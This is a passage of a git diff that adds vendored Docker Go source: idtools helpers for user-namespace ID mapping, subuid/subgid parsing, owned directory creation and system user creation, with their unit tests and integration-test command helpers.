+// If the directory already exists, this function still changes ownership +func MkdirAs(path string, mode os.FileMode, ownerUID, ownerGID int) error { + return mkdirAs(path, mode, ownerUID, ownerGID, false, true) +} + +// GetRootUIDGID retrieves the remapped root uid/gid pair from the set of maps. +// If the maps are empty, then the root uid/gid will default to "real" 0/0 +func GetRootUIDGID(uidMap, gidMap []IDMap) (int, int, error) { + var uid, gid int + + if uidMap != nil { + xUID, err := ToHost(0, uidMap) + if err != nil { + return -1, -1, err + } + uid = xUID + } + if gidMap != nil { + xGID, err := ToHost(0, gidMap) + if err != nil { + return -1, -1, err + } + gid = xGID + } + return uid, gid, nil +} + +// ToContainer takes an id mapping, and uses it to translate a +// host ID to the remapped ID. If no map is provided, then the translation +// assumes a 1-to-1 mapping and returns the passed in id +func ToContainer(hostID int, idMap []IDMap) (int, error) { + if idMap == nil { + return hostID, nil + } + for _, m := range idMap { + if (hostID >= m.HostID) && (hostID <= (m.HostID + m.Size - 1)) { + contID := m.ContainerID + (hostID - m.HostID) + return contID, nil + } + } + return -1, fmt.Errorf("Host ID %d cannot be mapped to a container ID", hostID) +} + +// ToHost takes an id mapping and a remapped ID, and translates the +// ID to the mapped host ID. 
If no map is provided, then the translation +// assumes a 1-to-1 mapping and returns the passed in id # +func ToHost(contID int, idMap []IDMap) (int, error) { + if idMap == nil { + return contID, nil + } + for _, m := range idMap { + if (contID >= m.ContainerID) && (contID <= (m.ContainerID + m.Size - 1)) { + hostID := m.HostID + (contID - m.ContainerID) + return hostID, nil + } + } + return -1, fmt.Errorf("Container ID %d cannot be mapped to a host ID", contID) +} + +// CreateIDMappings takes a requested user and group name and +// using the data from /etc/sub{uid,gid} ranges, creates the +// proper uid and gid remapping ranges for that user/group pair +func CreateIDMappings(username, groupname string) ([]IDMap, []IDMap, error) { + subuidRanges, err := parseSubuid(username) + if err != nil { + return nil, nil, err + } + subgidRanges, err := parseSubgid(groupname) + if err != nil { + return nil, nil, err + } + if len(subuidRanges) == 0 { + return nil, nil, fmt.Errorf("No subuid ranges found for user %q", username) + } + if len(subgidRanges) == 0 { + return nil, nil, fmt.Errorf("No subgid ranges found for group %q", groupname) + } + + return createIDMap(subuidRanges), createIDMap(subgidRanges), nil +} + +func createIDMap(subidRanges ranges) []IDMap { + idMap := []IDMap{} + + // sort the ranges by lowest ID first + sort.Sort(subidRanges) + containerID := 0 + for _, idrange := range subidRanges { + idMap = append(idMap, IDMap{ + ContainerID: containerID, + HostID: idrange.Start, + Size: idrange.Length, + }) + containerID = containerID + idrange.Length + } + return idMap +} + +func parseSubuid(username string) (ranges, error) { + return parseSubidFile(subuidFileName, username) +} + +func parseSubgid(username string) (ranges, error) { + return parseSubidFile(subgidFileName, username) +} + +// parseSubidFile will read the appropriate file (/etc/subuid or /etc/subgid) +// and return all found ranges for a specified username. 
If the special value +// "ALL" is supplied for username, then all ranges in the file will be returned +func parseSubidFile(path, username string) (ranges, error) { + var rangeList ranges + + subidFile, err := os.Open(path) + if err != nil { + return rangeList, err + } + defer subidFile.Close() + + s := bufio.NewScanner(subidFile) + for s.Scan() { + if err := s.Err(); err != nil { + return rangeList, err + } + + text := strings.TrimSpace(s.Text()) + if text == "" || strings.HasPrefix(text, "#") { + continue + } + parts := strings.Split(text, ":") + if len(parts) != 3 { + return rangeList, fmt.Errorf("Cannot parse subuid/gid information: Format not correct for %s file", path) + } + if parts[0] == username || username == "ALL" { + startid, err := strconv.Atoi(parts[1]) + if err != nil { + return rangeList, fmt.Errorf("String to int conversion failed during subuid/gid parsing of %s: %v", path, err) + } + length, err := strconv.Atoi(parts[2]) + if err != nil { + return rangeList, fmt.Errorf("String to int conversion failed during subuid/gid parsing of %s: %v", path, err) + } + rangeList = append(rangeList, subIDRange{startid, length}) + } + } + return rangeList, nil +} diff --git a/vendor/github.com/docker/docker/pkg/idtools/idtools_unix.go b/vendor/github.com/docker/docker/pkg/idtools/idtools_unix.go new file mode 100644 index 0000000000..f9eb31c3ec --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/idtools/idtools_unix.go @@ -0,0 +1,207 @@ +// +build !windows + +package idtools + +import ( + "bytes" + "fmt" + "io" + "os" + "path/filepath" + "strings" + "sync" + + "github.com/docker/docker/pkg/system" + "github.com/opencontainers/runc/libcontainer/user" +) + +var ( + entOnce sync.Once + getentCmd string +) + +func mkdirAs(path string, mode os.FileMode, ownerUID, ownerGID int, mkAll, chownExisting bool) error { + // make an array containing the original path asked for, plus (for mkAll == true) + // all path components leading up to the complete path that don't 
exist before we MkdirAll + // so that we can chown all of them properly at the end. If chownExisting is false, we won't + // chown the full directory path if it exists + var paths []string + if _, err := os.Stat(path); err != nil && os.IsNotExist(err) { + paths = []string{path} + } else if err == nil && chownExisting { + if err := os.Chown(path, ownerUID, ownerGID); err != nil { + return err + } + // short-circuit--we were called with an existing directory and chown was requested + return nil + } else if err == nil { + // nothing to do; directory path fully exists already and chown was NOT requested + return nil + } + + if mkAll { + // walk back to "/" looking for directories which do not exist + // and add them to the paths array for chown after creation + dirPath := path + for { + dirPath = filepath.Dir(dirPath) + if dirPath == "/" { + break + } + if _, err := os.Stat(dirPath); err != nil && os.IsNotExist(err) { + paths = append(paths, dirPath) + } + } + if err := system.MkdirAll(path, mode); err != nil && !os.IsExist(err) { + return err + } + } else { + if err := os.Mkdir(path, mode); err != nil && !os.IsExist(err) { + return err + } + } + // even if it existed, we will chown the requested path + any subpaths that + // didn't exist when we called MkdirAll + for _, pathComponent := range paths { + if err := os.Chown(pathComponent, ownerUID, ownerGID); err != nil { + return err + } + } + return nil +} + +// CanAccess takes a valid (existing) directory and a uid, gid pair and determines +// if that uid, gid pair has access (execute bit) to the directory +func CanAccess(path string, uid, gid int) bool { + statInfo, err := system.Stat(path) + if err != nil { + return false + } + fileMode := os.FileMode(statInfo.Mode()) + permBits := fileMode.Perm() + return accessible(statInfo.UID() == uint32(uid), + statInfo.GID() == uint32(gid), permBits) +} + +func accessible(isOwner, isGroup bool, perms os.FileMode) bool { + if isOwner && (perms&0100 == 0100) { + return true + } 
+ if isGroup && (perms&0010 == 0010) { + return true + } + if perms&0001 == 0001 { + return true + } + return false +} + +// LookupUser uses traditional local system files lookup (from libcontainer/user) on a username, +// followed by a call to `getent` for supporting host configured non-files passwd and group dbs +func LookupUser(username string) (user.User, error) { + // first try a local system files lookup using existing capabilities + usr, err := user.LookupUser(username) + if err == nil { + return usr, nil + } + // local files lookup failed; attempt to call `getent` to query configured passwd dbs + usr, err = getentUser(fmt.Sprintf("%s %s", "passwd", username)) + if err != nil { + return user.User{}, err + } + return usr, nil +} + +// LookupUID uses traditional local system files lookup (from libcontainer/user) on a uid, +// followed by a call to `getent` for supporting host configured non-files passwd and group dbs +func LookupUID(uid int) (user.User, error) { + // first try a local system files lookup using existing capabilities + usr, err := user.LookupUid(uid) + if err == nil { + return usr, nil + } + // local files lookup failed; attempt to call `getent` to query configured passwd dbs + return getentUser(fmt.Sprintf("%s %d", "passwd", uid)) +} + +func getentUser(args string) (user.User, error) { + reader, err := callGetent(args) + if err != nil { + return user.User{}, err + } + users, err := user.ParsePasswd(reader) + if err != nil { + return user.User{}, err + } + if len(users) == 0 { + return user.User{}, fmt.Errorf("getent failed to find passwd entry for %q", strings.Split(args, " ")[1]) + } + return users[0], nil +} + +// LookupGroup uses traditional local system files lookup (from libcontainer/user) on a group name, +// followed by a call to `getent` for supporting host configured non-files passwd and group dbs +func LookupGroup(groupname string) (user.Group, error) { + // first try a local system files lookup using existing capabilities + group, 
err := user.LookupGroup(groupname) + if err == nil { + return group, nil + } + // local files lookup failed; attempt to call `getent` to query configured group dbs + return getentGroup(fmt.Sprintf("%s %s", "group", groupname)) +} + +// LookupGID uses traditional local system files lookup (from libcontainer/user) on a group ID, +// followed by a call to `getent` for supporting host configured non-files passwd and group dbs +func LookupGID(gid int) (user.Group, error) { + // first try a local system files lookup using existing capabilities + group, err := user.LookupGid(gid) + if err == nil { + return group, nil + } + // local files lookup failed; attempt to call `getent` to query configured group dbs + return getentGroup(fmt.Sprintf("%s %d", "group", gid)) +} + +func getentGroup(args string) (user.Group, error) { + reader, err := callGetent(args) + if err != nil { + return user.Group{}, err + } + groups, err := user.ParseGroup(reader) + if err != nil { + return user.Group{}, err + } + if len(groups) == 0 { + return user.Group{}, fmt.Errorf("getent failed to find groups entry for %q", strings.Split(args, " ")[1]) + } + return groups[0], nil +} + +func callGetent(args string) (io.Reader, error) { + entOnce.Do(func() { getentCmd, _ = resolveBinary("getent") }) + // if no `getent` command on host, can't do anything else + if getentCmd == "" { + return nil, fmt.Errorf("") + } + out, err := execCmd(getentCmd, args) + if err != nil { + exitCode, errC := system.GetExitCode(err) + if errC != nil { + return nil, err + } + switch exitCode { + case 1: + return nil, fmt.Errorf("getent reported invalid parameters/database unknown") + case 2: + terms := strings.Split(args, " ") + return nil, fmt.Errorf("getent unable to find entry %q in %s database", terms[1], terms[0]) + case 3: + return nil, fmt.Errorf("getent database doesn't support enumeration") + default: + return nil, err + } + + } + return bytes.NewReader(out), nil +} diff --git 
a/vendor/github.com/docker/docker/pkg/idtools/idtools_unix_test.go b/vendor/github.com/docker/docker/pkg/idtools/idtools_unix_test.go new file mode 100644 index 0000000000..540d3079ee --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/idtools/idtools_unix_test.go @@ -0,0 +1,271 @@ +// +build !windows + +package idtools + +import ( + "fmt" + "io/ioutil" + "os" + "path/filepath" + "syscall" + "testing" +) + +type node struct { + uid int + gid int +} + +func TestMkdirAllAs(t *testing.T) { + dirName, err := ioutil.TempDir("", "mkdirall") + if err != nil { + t.Fatalf("Couldn't create temp dir: %v", err) + } + defer os.RemoveAll(dirName) + + testTree := map[string]node{ + "usr": {0, 0}, + "usr/bin": {0, 0}, + "lib": {33, 33}, + "lib/x86_64": {45, 45}, + "lib/x86_64/share": {1, 1}, + } + + if err := buildTree(dirName, testTree); err != nil { + t.Fatal(err) + } + + // test adding a directory to a pre-existing dir; only the new dir is owned by the uid/gid + if err := MkdirAllAs(filepath.Join(dirName, "usr", "share"), 0755, 99, 99); err != nil { + t.Fatal(err) + } + testTree["usr/share"] = node{99, 99} + verifyTree, err := readTree(dirName, "") + if err != nil { + t.Fatal(err) + } + if err := compareTrees(testTree, verifyTree); err != nil { + t.Fatal(err) + } + + // test 2-deep new directories--both should be owned by the uid/gid pair + if err := MkdirAllAs(filepath.Join(dirName, "lib", "some", "other"), 0755, 101, 101); err != nil { + t.Fatal(err) + } + testTree["lib/some"] = node{101, 101} + testTree["lib/some/other"] = node{101, 101} + verifyTree, err = readTree(dirName, "") + if err != nil { + t.Fatal(err) + } + if err := compareTrees(testTree, verifyTree); err != nil { + t.Fatal(err) + } + + // test a directory that already exists; should be chowned, but nothing else + if err := MkdirAllAs(filepath.Join(dirName, "usr"), 0755, 102, 102); err != nil { + t.Fatal(err) + } + testTree["usr"] = node{102, 102} + verifyTree, err = readTree(dirName, "") + if err != nil { + 
t.Fatal(err) + } + if err := compareTrees(testTree, verifyTree); err != nil { + t.Fatal(err) + } +} + +func TestMkdirAllNewAs(t *testing.T) { + + dirName, err := ioutil.TempDir("", "mkdirnew") + if err != nil { + t.Fatalf("Couldn't create temp dir: %v", err) + } + defer os.RemoveAll(dirName) + + testTree := map[string]node{ + "usr": {0, 0}, + "usr/bin": {0, 0}, + "lib": {33, 33}, + "lib/x86_64": {45, 45}, + "lib/x86_64/share": {1, 1}, + } + + if err := buildTree(dirName, testTree); err != nil { + t.Fatal(err) + } + + // test adding a directory to a pre-existing dir; only the new dir is owned by the uid/gid + if err := MkdirAllNewAs(filepath.Join(dirName, "usr", "share"), 0755, 99, 99); err != nil { + t.Fatal(err) + } + testTree["usr/share"] = node{99, 99} + verifyTree, err := readTree(dirName, "") + if err != nil { + t.Fatal(err) + } + if err := compareTrees(testTree, verifyTree); err != nil { + t.Fatal(err) + } + + // test 2-deep new directories--both should be owned by the uid/gid pair + if err := MkdirAllNewAs(filepath.Join(dirName, "lib", "some", "other"), 0755, 101, 101); err != nil { + t.Fatal(err) + } + testTree["lib/some"] = node{101, 101} + testTree["lib/some/other"] = node{101, 101} + verifyTree, err = readTree(dirName, "") + if err != nil { + t.Fatal(err) + } + if err := compareTrees(testTree, verifyTree); err != nil { + t.Fatal(err) + } + + // test a directory that already exists; should NOT be chowned + if err := MkdirAllNewAs(filepath.Join(dirName, "usr"), 0755, 102, 102); err != nil { + t.Fatal(err) + } + verifyTree, err = readTree(dirName, "") + if err != nil { + t.Fatal(err) + } + if err := compareTrees(testTree, verifyTree); err != nil { + t.Fatal(err) + } +} + +func TestMkdirAs(t *testing.T) { + + dirName, err := ioutil.TempDir("", "mkdir") + if err != nil { + t.Fatalf("Couldn't create temp dir: %v", err) + } + defer os.RemoveAll(dirName) + + testTree := map[string]node{ + "usr": {0, 0}, + } + if err := buildTree(dirName, testTree); err != nil { 
+ t.Fatal(err) + } + + // test a directory that already exists; should just chown to the requested uid/gid + if err := MkdirAs(filepath.Join(dirName, "usr"), 0755, 99, 99); err != nil { + t.Fatal(err) + } + testTree["usr"] = node{99, 99} + verifyTree, err := readTree(dirName, "") + if err != nil { + t.Fatal(err) + } + if err := compareTrees(testTree, verifyTree); err != nil { + t.Fatal(err) + } + + // create a subdir under a dir which doesn't exist--should fail + if err := MkdirAs(filepath.Join(dirName, "usr", "bin", "subdir"), 0755, 102, 102); err == nil { + t.Fatalf("Trying to create a directory with Mkdir where the parent doesn't exist should have failed") + } + + // create a subdir under an existing dir; should only change the ownership of the new subdir + if err := MkdirAs(filepath.Join(dirName, "usr", "bin"), 0755, 102, 102); err != nil { + t.Fatal(err) + } + testTree["usr/bin"] = node{102, 102} + verifyTree, err = readTree(dirName, "") + if err != nil { + t.Fatal(err) + } + if err := compareTrees(testTree, verifyTree); err != nil { + t.Fatal(err) + } +} + +func buildTree(base string, tree map[string]node) error { + for path, node := range tree { + fullPath := filepath.Join(base, path) + if err := os.MkdirAll(fullPath, 0755); err != nil { + return fmt.Errorf("Couldn't create path: %s; error: %v", fullPath, err) + } + if err := os.Chown(fullPath, node.uid, node.gid); err != nil { + return fmt.Errorf("Couldn't chown path: %s; error: %v", fullPath, err) + } + } + return nil +} + +func readTree(base, root string) (map[string]node, error) { + tree := make(map[string]node) + + dirInfos, err := ioutil.ReadDir(base) + if err != nil { + return nil, fmt.Errorf("Couldn't read directory entries for %q: %v", base, err) + } + + for _, info := range dirInfos { + s := &syscall.Stat_t{} + if err := syscall.Stat(filepath.Join(base, info.Name()), s); err != nil { + return nil, fmt.Errorf("Can't stat file %q: %v", filepath.Join(base, info.Name()), err) + } + 
tree[filepath.Join(root, info.Name())] = node{int(s.Uid), int(s.Gid)} + if info.IsDir() { + // read the subdirectory + subtree, err := readTree(filepath.Join(base, info.Name()), filepath.Join(root, info.Name())) + if err != nil { + return nil, err + } + for path, nodeinfo := range subtree { + tree[path] = nodeinfo + } + } + } + return tree, nil +} + +func compareTrees(left, right map[string]node) error { + if len(left) != len(right) { + return fmt.Errorf("Trees aren't the same size") + } + for path, nodeLeft := range left { + if nodeRight, ok := right[path]; ok { + if nodeRight.uid != nodeLeft.uid || nodeRight.gid != nodeLeft.gid { + // mismatch + return fmt.Errorf("mismatched ownership for %q: expected: %d:%d, got: %d:%d", path, + nodeLeft.uid, nodeLeft.gid, nodeRight.uid, nodeRight.gid) + } + continue + } + return fmt.Errorf("right tree didn't contain path %q", path) + } + return nil +} + +func TestParseSubidFileWithNewlinesAndComments(t *testing.T) { + tmpDir, err := ioutil.TempDir("", "parsesubid") + if err != nil { + t.Fatal(err) + } + fnamePath := filepath.Join(tmpDir, "testsubuid") + fcontent := `tss:100000:65536 +# empty default subuid/subgid file + +dockremap:231072:65536` + if err := ioutil.WriteFile(fnamePath, []byte(fcontent), 0644); err != nil { + t.Fatal(err) + } + ranges, err := parseSubidFile(fnamePath, "dockremap") + if err != nil { + t.Fatal(err) + } + if len(ranges) != 1 { + t.Fatalf("wanted 1 element in ranges, got %d instead", len(ranges)) + } + if ranges[0].Start != 231072 { + t.Fatalf("wanted 231072, got %d instead", ranges[0].Start) + } + if ranges[0].Length != 65536 { + t.Fatalf("wanted 65536, got %d instead", ranges[0].Length) + } +} diff --git a/vendor/github.com/docker/docker/pkg/idtools/idtools_windows.go b/vendor/github.com/docker/docker/pkg/idtools/idtools_windows.go new file mode 100644 index 0000000000..49f67e78c1 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/idtools/idtools_windows.go @@ -0,0 +1,25 @@ +// +build windows + 
+package idtools + +import ( + "os" + + "github.com/docker/docker/pkg/system" +) + +// Platforms such as Windows do not support the UID/GID concept. So make this +// just a wrapper around system.MkdirAll. +func mkdirAs(path string, mode os.FileMode, ownerUID, ownerGID int, mkAll, chownExisting bool) error { + if err := system.MkdirAll(path, mode); err != nil && !os.IsExist(err) { + return err + } + return nil +} + +// CanAccess takes a valid (existing) directory and a uid, gid pair and determines +// if that uid, gid pair has access (execute bit) to the directory +// Windows does not require/support this function, so always return true +func CanAccess(path string, uid, gid int) bool { + return true +} diff --git a/vendor/github.com/docker/docker/pkg/idtools/usergroupadd_linux.go b/vendor/github.com/docker/docker/pkg/idtools/usergroupadd_linux.go new file mode 100644 index 0000000000..9da7975e2c --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/idtools/usergroupadd_linux.go @@ -0,0 +1,164 @@ +package idtools + +import ( + "fmt" + "regexp" + "sort" + "strconv" + "strings" + "sync" +) + +// add a user and/or group to Linux /etc/passwd, /etc/group using standard +// Linux distribution commands: +// adduser --system --shell /bin/false --disabled-login --disabled-password --no-create-home --group +// useradd -r -s /bin/false + +var ( + once sync.Once + userCommand string + + cmdTemplates = map[string]string{ + "adduser": "--system --shell /bin/false --no-create-home --disabled-login --disabled-password --group %s", + "useradd": "-r -s /bin/false %s", + "usermod": "-%s %d-%d %s", + } + + idOutRegexp = regexp.MustCompile(`uid=([0-9]+).*gid=([0-9]+)`) + // default length for a UID/GID subordinate range + defaultRangeLen = 65536 + defaultRangeStart = 100000 + userMod = "usermod" +) + +// AddNamespaceRangesUser takes a username and uses the standard system +// utility to create a system user/group pair used to hold the +// /etc/sub{uid,gid} ranges which will be used for 
user namespace +// mapping ranges in containers. +func AddNamespaceRangesUser(name string) (int, int, error) { + if err := addUser(name); err != nil { + return -1, -1, fmt.Errorf("Error adding user %q: %v", name, err) + } + + // Query the system for the created uid and gid pair + out, err := execCmd("id", name) + if err != nil { + return -1, -1, fmt.Errorf("Error trying to find uid/gid for new user %q: %v", name, err) + } + matches := idOutRegexp.FindStringSubmatch(strings.TrimSpace(string(out))) + if len(matches) != 3 { + return -1, -1, fmt.Errorf("Can't find uid, gid from `id` output: %q", string(out)) + } + uid, err := strconv.Atoi(matches[1]) + if err != nil { + return -1, -1, fmt.Errorf("Can't convert found uid (%s) to int: %v", matches[1], err) + } + gid, err := strconv.Atoi(matches[2]) + if err != nil { + return -1, -1, fmt.Errorf("Can't convert found gid (%s) to int: %v", matches[2], err) + } + + // Now we need to create the subuid/subgid ranges for our new user/group (system users + // do not get auto-created ranges in subuid/subgid) + + if err := createSubordinateRanges(name); err != nil { + return -1, -1, fmt.Errorf("Couldn't create subordinate ID ranges: %v", err) + } + return uid, gid, nil +} + +func addUser(userName string) error { + once.Do(func() { + // set up which commands are used for adding users/groups dependent on distro + if _, err := resolveBinary("adduser"); err == nil { + userCommand = "adduser" + } else if _, err := resolveBinary("useradd"); err == nil { + userCommand = "useradd" + } + }) + if userCommand == "" { + return fmt.Errorf("Cannot add user; no useradd/adduser binary found") + } + args := fmt.Sprintf(cmdTemplates[userCommand], userName) + out, err := execCmd(userCommand, args) + if err != nil { + return fmt.Errorf("Failed to add user with error: %v; output: %q", err, string(out)) + } + return nil +} + +func createSubordinateRanges(name string) error { + + // first, we should verify that ranges weren't automatically created + // 
by the distro tooling + ranges, err := parseSubuid(name) + if err != nil { + return fmt.Errorf("Error while looking for subuid ranges for user %q: %v", name, err) + } + if len(ranges) == 0 { + // no UID ranges; let's create one + startID, err := findNextUIDRange() + if err != nil { + return fmt.Errorf("Can't find available subuid range: %v", err) + } + out, err := execCmd(userMod, fmt.Sprintf(cmdTemplates[userMod], "v", startID, startID+defaultRangeLen-1, name)) + if err != nil { + return fmt.Errorf("Unable to add subuid range to user: %q; output: %s, err: %v", name, out, err) + } + } + + ranges, err = parseSubgid(name) + if err != nil { + return fmt.Errorf("Error while looking for subgid ranges for user %q: %v", name, err) + } + if len(ranges) == 0 { + // no GID ranges; let's create one + startID, err := findNextGIDRange() + if err != nil { + return fmt.Errorf("Can't find available subgid range: %v", err) + } + out, err := execCmd(userMod, fmt.Sprintf(cmdTemplates[userMod], "w", startID, startID+defaultRangeLen-1, name)) + if err != nil { + return fmt.Errorf("Unable to add subgid range to user: %q; output: %s, err: %v", name, out, err) + } + } + return nil +} + +func findNextUIDRange() (int, error) { + ranges, err := parseSubuid("ALL") + if err != nil { + return -1, fmt.Errorf("Couldn't parse all ranges in /etc/subuid file: %v", err) + } + sort.Sort(ranges) + return findNextRangeStart(ranges) +} + +func findNextGIDRange() (int, error) { + ranges, err := parseSubgid("ALL") + if err != nil { + return -1, fmt.Errorf("Couldn't parse all ranges in /etc/subgid file: %v", err) + } + sort.Sort(ranges) + return findNextRangeStart(ranges) +} + +func findNextRangeStart(rangeList ranges) (int, error) { + startID := defaultRangeStart + for _, arange := range rangeList { + if wouldOverlap(arange, startID) { + startID = arange.Start + arange.Length + } + } + return startID, nil +} + +func wouldOverlap(arange subIDRange, ID int) bool { + low := ID + high := ID + defaultRangeLen + 
if (low >= arange.Start && low <= arange.Start+arange.Length) || + (high <= arange.Start+arange.Length && high >= arange.Start) { + return true + } + return false +} diff --git a/vendor/github.com/docker/docker/pkg/idtools/usergroupadd_unsupported.go b/vendor/github.com/docker/docker/pkg/idtools/usergroupadd_unsupported.go new file mode 100644 index 0000000000..d98b354cbd --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/idtools/usergroupadd_unsupported.go @@ -0,0 +1,12 @@ +// +build !linux + +package idtools + +import "fmt" + +// AddNamespaceRangesUser takes a name and finds an unused uid, gid pair +// and calls the appropriate helper function to add the group and then +// the user to the group in /etc/group and /etc/passwd respectively. +func AddNamespaceRangesUser(name string) (int, int, error) { + return -1, -1, fmt.Errorf("No support for adding users or groups on this OS") +} diff --git a/vendor/github.com/docker/docker/pkg/idtools/utils_unix.go b/vendor/github.com/docker/docker/pkg/idtools/utils_unix.go new file mode 100644 index 0000000000..9703ecbd9d --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/idtools/utils_unix.go @@ -0,0 +1,32 @@ +// +build !windows + +package idtools + +import ( + "fmt" + "os/exec" + "path/filepath" + "strings" +) + +func resolveBinary(binname string) (string, error) { + binaryPath, err := exec.LookPath(binname) + if err != nil { + return "", err + } + resolvedPath, err := filepath.EvalSymlinks(binaryPath) + if err != nil { + return "", err + } + //only return no error if the final resolved binary basename + //matches what was searched for + if filepath.Base(resolvedPath) == binname { + return resolvedPath, nil + } + return "", fmt.Errorf("Binary %q does not resolve to a binary of that name in $PATH (%q)", binname, resolvedPath) +} + +func execCmd(cmd, args string) ([]byte, error) { + execCmd := exec.Command(cmd, strings.Split(args, " ")...) 
+ return execCmd.CombinedOutput() +} diff --git a/vendor/github.com/docker/docker/pkg/integration/checker/checker.go b/vendor/github.com/docker/docker/pkg/integration/checker/checker.go new file mode 100644 index 0000000000..d1b703a599 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/integration/checker/checker.go @@ -0,0 +1,46 @@ +// Package checker provides Docker specific implementations of the go-check.Checker interface. +package checker + +import ( + "github.com/go-check/check" + "github.com/vdemeester/shakers" +) + +// As a commodity, we bring all check.Checker variables into the current namespace to avoid having +// to think about check.X versus checker.X. +var ( + DeepEquals = check.DeepEquals + ErrorMatches = check.ErrorMatches + FitsTypeOf = check.FitsTypeOf + HasLen = check.HasLen + Implements = check.Implements + IsNil = check.IsNil + Matches = check.Matches + Not = check.Not + NotNil = check.NotNil + PanicMatches = check.PanicMatches + Panics = check.Panics + + Contains = shakers.Contains + ContainsAny = shakers.ContainsAny + Count = shakers.Count + Equals = shakers.Equals + EqualFold = shakers.EqualFold + False = shakers.False + GreaterOrEqualThan = shakers.GreaterOrEqualThan + GreaterThan = shakers.GreaterThan + HasPrefix = shakers.HasPrefix + HasSuffix = shakers.HasSuffix + Index = shakers.Index + IndexAny = shakers.IndexAny + IsAfter = shakers.IsAfter + IsBefore = shakers.IsBefore + IsBetween = shakers.IsBetween + IsLower = shakers.IsLower + IsUpper = shakers.IsUpper + LessOrEqualThan = shakers.LessOrEqualThan + LessThan = shakers.LessThan + TimeEquals = shakers.TimeEquals + True = shakers.True + TimeIgnore = shakers.TimeIgnore +) diff --git a/vendor/github.com/docker/docker/pkg/integration/cmd/command.go b/vendor/github.com/docker/docker/pkg/integration/cmd/command.go new file mode 100644 index 0000000000..76d04e8df5 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/integration/cmd/command.go @@ -0,0 +1,294 @@ +package cmd + +import ( 
+ "bytes" + "fmt" + "io" + "os/exec" + "path/filepath" + "runtime" + "strings" + "sync" + "time" + + "github.com/docker/docker/pkg/system" + "github.com/go-check/check" +) + +type testingT interface { + Fatalf(string, ...interface{}) +} + +const ( + // None is a token to inform Result.Assert that the output should be empty + None string = "" +) + +type lockedBuffer struct { + m sync.RWMutex + buf bytes.Buffer +} + +func (buf *lockedBuffer) Write(b []byte) (int, error) { + buf.m.Lock() + defer buf.m.Unlock() + return buf.buf.Write(b) +} + +func (buf *lockedBuffer) String() string { + buf.m.RLock() + defer buf.m.RUnlock() + return buf.buf.String() +} + +// Result stores the result of running a command +type Result struct { + Cmd *exec.Cmd + ExitCode int + Error error + // Timeout is true if the command was killed because it ran for too long + Timeout bool + outBuffer *lockedBuffer + errBuffer *lockedBuffer +} + +// Assert compares the Result against the Expected struct, and fails the test if +// any of the expcetations are not met. 
+func (r *Result) Assert(t testingT, exp Expected) { + err := r.Compare(exp) + if err == nil { + return + } + + _, file, line, _ := runtime.Caller(1) + t.Fatalf("at %s:%d\n%s", filepath.Base(file), line, err.Error()) +} + +// Compare returns an formatted error with the command, stdout, stderr, exit +// code, and any failed expectations +func (r *Result) Compare(exp Expected) error { + errors := []string{} + add := func(format string, args ...interface{}) { + errors = append(errors, fmt.Sprintf(format, args...)) + } + + if exp.ExitCode != r.ExitCode { + add("ExitCode was %d expected %d", r.ExitCode, exp.ExitCode) + } + if exp.Timeout != r.Timeout { + if exp.Timeout { + add("Expected command to timeout") + } else { + add("Expected command to finish, but it hit the timeout") + } + } + if !matchOutput(exp.Out, r.Stdout()) { + add("Expected stdout to contain %q", exp.Out) + } + if !matchOutput(exp.Err, r.Stderr()) { + add("Expected stderr to contain %q", exp.Err) + } + switch { + // If a non-zero exit code is expected there is going to be an error. 
+ // Don't require an error message as well as an exit code because the + // error message is going to be "exit status which is not useful + case exp.Error == "" && exp.ExitCode != 0: + case exp.Error == "" && r.Error != nil: + add("Expected no error") + case exp.Error != "" && r.Error == nil: + add("Expected error to contain %q, but there was no error", exp.Error) + case exp.Error != "" && !strings.Contains(r.Error.Error(), exp.Error): + add("Expected error to contain %q", exp.Error) + } + + if len(errors) == 0 { + return nil + } + return fmt.Errorf("%s\nFailures:\n%s\n", r, strings.Join(errors, "\n")) +} + +func matchOutput(expected string, actual string) bool { + switch expected { + case None: + return actual == "" + default: + return strings.Contains(actual, expected) + } +} + +func (r *Result) String() string { + var timeout string + if r.Timeout { + timeout = " (timeout)" + } + + return fmt.Sprintf(` +Command: %s +ExitCode: %d%s, Error: %s +Stdout: %v +Stderr: %v +`, + strings.Join(r.Cmd.Args, " "), + r.ExitCode, + timeout, + r.Error, + r.Stdout(), + r.Stderr()) +} + +// Expected is the expected output from a Command. This struct is compared to a +// Result struct by Result.Assert(). 
+type Expected struct { + ExitCode int + Timeout bool + Error string + Out string + Err string +} + +// Success is the default expected result +var Success = Expected{} + +// Stdout returns the stdout of the process as a string +func (r *Result) Stdout() string { + return r.outBuffer.String() +} + +// Stderr returns the stderr of the process as a string +func (r *Result) Stderr() string { + return r.errBuffer.String() +} + +// Combined returns the stdout and stderr combined into a single string +func (r *Result) Combined() string { + return r.outBuffer.String() + r.errBuffer.String() +} + +// SetExitError sets Error and ExitCode based on Error +func (r *Result) SetExitError(err error) { + if err == nil { + return + } + r.Error = err + r.ExitCode = system.ProcessExitCode(err) +} + +type matches struct{} + +// Info returns the CheckerInfo +func (m *matches) Info() *check.CheckerInfo { + return &check.CheckerInfo{ + Name: "CommandMatches", + Params: []string{"result", "expected"}, + } +} + +// Check compares a result against the expected +func (m *matches) Check(params []interface{}, names []string) (bool, string) { + result, ok := params[0].(*Result) + if !ok { + return false, fmt.Sprintf("result must be a *Result, not %T", params[0]) + } + expected, ok := params[1].(Expected) + if !ok { + return false, fmt.Sprintf("expected must be an Expected, not %T", params[1]) + } + + err := result.Compare(expected) + if err == nil { + return true, "" + } + return false, err.Error() +} + +// Matches is a gocheck.Checker for comparing a Result against an Expected +var Matches = &matches{} + +// Cmd contains the arguments and options for a process to run as part of a test +// suite. 
